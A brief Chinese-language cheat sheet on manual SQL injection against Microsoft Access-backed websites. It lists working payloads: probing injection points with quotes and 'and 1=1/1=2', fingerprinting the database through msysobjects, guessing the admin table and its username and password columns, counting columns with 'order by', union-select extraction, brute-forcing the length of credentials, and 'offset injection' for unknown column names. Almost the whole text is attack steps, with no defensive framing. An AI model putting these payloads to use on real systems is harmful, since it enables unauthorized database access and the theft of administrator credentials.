access数据库的手工注入

access数据库

优势：提高速度和减少代码量

缺点：数据过大性能下降，安全性低

后缀名：.mdb

打开工具：辅臣数据库浏览器，破障浏览器

access注入

判断注入点：' ，and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号，报错有注入点

判断数据库类型：and exists(select * from msysobjects)>0 存在说明是access数据库 , and exists(select * from sysobjects)>0 存在说明是sql server数据库

判断数据库中的表：and exists(select * from admin) 返回成功说明存在

access的数据库中的表：admin，msysobjects，user，username，

判断数据库中表内的字段名：and exists(select username from admin) 返回成功说明存在

判断字段长度：order by N

报错：and 1=2 union select 1,2,....,N from admin(联合查询)

判断账户密码长度：and (select len(admin) from admin)=5 如果返回正常说明管理账户的长度为5

and (select len(password) from admin)=5 猜解管理密码长度是5

偏移注入

主要用来解决表名猜到，列名猜不到的情况

and 1=2 union select 1,2,....,N from admin(联合查询)，用*从最后一个字段向前逐个代替，直到显示正常为止，*代表所有数据表内的字段